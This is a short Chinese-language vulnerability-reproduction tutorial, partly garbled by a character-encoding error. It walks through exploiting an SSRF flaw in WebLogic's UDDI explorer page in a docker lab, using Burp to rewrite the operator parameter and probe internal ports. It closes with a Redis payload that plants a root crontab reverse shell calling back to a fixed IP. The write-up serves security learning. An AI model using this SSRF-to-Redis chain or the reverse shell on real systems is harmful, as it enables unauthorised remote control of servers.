一、使用docker搭建環(huán)境
docker安裝及搭建環(huán)境教程:https://www.freebuf.com/sectool/252257.html
訪問7001端口
二、漏洞復(fù)現(xiàn)步驟
1、漏洞存在頁面 /uddiexplorer/SearchPublicRegistries.jsp
2、檢查一下IBM這個(gè)地方看看
發(fā)現(xiàn)是個(gè)連接,這就可能存在ssrf了
3、使用burp suite抓包,點(diǎn)擊Search
4、修改operator參數(shù)的連接
5、訪問結(jié)果
訪問不存在的端口返回?could not connect over HTTP
訪問存在的端口返回狀態(tài)碼
訪問內(nèi)網(wǎng)
利用redis反彈shell的payload
set 1 "nnnn* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1nnnn" config set dir /etc/ config set dbfilename crontab save
? 版權(quán)聲明
文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載。
THE END